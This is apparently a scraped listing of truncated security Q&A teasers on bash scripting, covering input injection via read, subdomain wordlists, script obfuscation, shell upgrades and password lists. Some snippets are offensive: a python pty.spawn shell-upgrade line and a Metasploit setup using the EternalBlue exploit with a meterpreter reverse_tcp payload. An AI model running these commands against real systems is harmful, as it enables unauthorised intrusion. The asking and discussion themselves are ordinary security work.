how to exploit read -p in bash script
i wanna execute ls command inplace of the output being "your name is ls"
is there a way to do it ?
read -p "name??" name
echo "your name is $name"
Collaborate Disseminate
i wanna execute ls command inplace of the output being "your name is ls"
is there a way to do it ?
read -p "name??" name
echo "your name is $name"
I noticed, that the direct download link to the whole list as an archive has vanished from the page at https://haveibeenpwned.com/Passwords .
It now refers to the PwnedPasswordsDownloader git-repo which offers a Windows dotNet Tool. But I … Continue reading How to get the pwned password list under Linux in the aera of ‘PwnedPasswordsDownloader’? [closed]
i have w wordlist of subdomains contains like this :
admin.bugbountytarget.com
portal.bugbountytarget.com
sales.bugbountytarget.com
vpn1.bugbountytarget.com
dev.test.bugbountytarget.com
…
And I want to grep subdomains names without &quo… Continue reading How i can grep only subdomain names without "target.com" [closed]
For an embedded IoT product running linux, digital signature validation of new firmware package is performed by a startup script file. For maintenance and troubleshooting purposes, the product does support a user account. As in the case of… Continue reading Obfuscation of scripts
I asked this at https://apple.stackexchange.com/questions/445343/macapps-link-possible-attack-vector-could-you-pipe-through-some-security-scr but I think this would be more appropriate place.
A work colleague said she is using https://maca… Continue reading macapps.link – possible attack vector – could you pipe through some security script
The thing is i use ZSH and we all know the steps to go to a full interactive shell, so I would like to have these commands in a script so that when I call it in an alias these steps are executed.
python3 -c ‘import pty; pty.spawn("/bi… Continue reading How can I have this in a bash script [migrated]
Based on my requirement of dev sever ,I have Created a Linux function that will create dev user( we have an group name developer and that group have the permission of “group:devs:r-x”).
as per my requirement (Take the users’s first name a… Continue reading New User creation & SSH Issue Linux script
Since I am new to Linux, when writing scripts I always followed the rule "the less code, the less attack surface", so I try to write scripts with privileged access (sudo, root, etc.) in sh and use less third-party programs (grep,… Continue reading BASH vs SH (dash, etc.) in terms of security
Working on a quick and easy script to exploit a system and establish persistence. To do so I have written 2 .rc scripts
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp<
set rhost 156.156.1…. Continue reading How do you place sequential metasploit rc scripts into a standard linux script [closed]
I’m trying to edit my rsyslog.conf in order to set hex parts of my auditd logs in clear.
Does anyone know if it is possible to configure rsyslog in order to apply a parsing on the log received by a bash script ? (Or any other technique)
It… Continue reading Rsyslog & Auditd – Parsing audit.log / proctitle hexadecimal value to ascii [migrated]